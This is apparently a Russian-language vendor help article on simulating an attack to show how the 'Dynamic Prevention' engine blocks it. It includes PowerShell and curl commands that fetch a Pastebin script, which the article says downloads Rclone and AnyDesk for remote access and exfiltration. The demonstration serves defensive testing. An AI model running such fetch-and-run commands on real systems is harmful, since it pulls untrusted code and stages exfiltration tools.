Dynamic Prevention — это движок безопасности на основе поведения, который активно применяет динамические меры контроля в ответ на обнаруженные угрозы, чтобы уменьшить поверхность атаки и смягчить угрозы на ранней стадии до того, как произойдет воздействие. Для получения дополнительной информации см. Что такое Dynamic Prevention?
В этой статье моделируется сценарий реальной атаки, чтобы продемонстрировать, как Dynamic Prevention защищает вашу сеть. В этом примере пользователь загружает скрипт из Pastebin, который злоумышленник использует для попытки получения дополнительных инструментов высокого риска, необходимых для проведения атаки в будущем. Dynamic Prevention идентифицирует вредоносное поведение и блокирует загрузку инструмента, предотвращая атаку до того, как она сможет прогрессировать или произойдет воздействие.
Ответ на эту атаку полностью автоматизирован. Дополнительные правила не требуются. Достаточно просто включить Dynamic Prevention, чтобы предотвратить атаку.
Чтобы смоделировать эту атаку:
- Загрузите инструмент высокого риска без блокировки
- Загрузите скрипт из Pastebin
- Попробуйте загрузить инструменты высокого риска снова. На этот раз загрузка заблокирована.
Чтобы показать, что Dynamic Prevention блокирует действия только тогда, когда они являются частью вредоносной последовательности, сначала загрузите Rclone — инструмент командной строки с открытым исходным кодом для управления файлами. Злоумышленники часто используют Rclone в качестве инструмента после компрометации, поскольку он легитимный, мощный и сливается с обычной административной активностью.
Загрузите Rclone из одного из следующих источников:
- Следующий URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
На устройствах Windows:
- Следующая команда PowerShell:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- Следующая команда PowerShell:
-
На устройствах macOS/Linux:
- Следующая команда терминала:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- Следующая команда терминала:
Чтобы моделировать начало атаки, загрузите скрипт из Pastebin, который при выполнении загружает общие инструменты злоумышленника, например, Rclone и AnyDesk, для удаленного доступа и эксфильтрации.
Загрузите и выполните скрипт из Pastebin:
-
На устройствах Windows:
- Следующая команда PowerShell:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- Следующая команда PowerShell:
-
На устройствах macOS/Linux:
- Следующая команда терминала:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- Следующая команда терминала:
Скрипт выполняется и загружает инструменты. Динамическое управление применяется к хосту, который показан в виджете Хост с управлением на Панели управления угрозами безопасности. Для получения дополнительной информации см. Использование панели угроз безопасности.
В смоделированной атаке злоумышленник пытается загрузить Rclone. Однако поскольку это действие следует за подозрительной активностью загрузки скрипта из Pastebin и применяется мера контроля, Dynamic Prevention блокирует загрузку Rclone.
Загрузите Rclone из одного из следующих источников:
- Следующий URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
На устройствах Windows:
- Следующая команда PowerShell:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- Следующая команда PowerShell:
-
На устройствах macOS/Linux:
- Следующая команда терминала:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- Следующая команда терминала:
Загрузка этого файла заблокирована мерой контроля. Смягченная угроза отображается в виджете Хост с нейтрализованными угрозами на Панели управления угрозами безопасности.
0 комментариев
Статья закрыта для комментариев.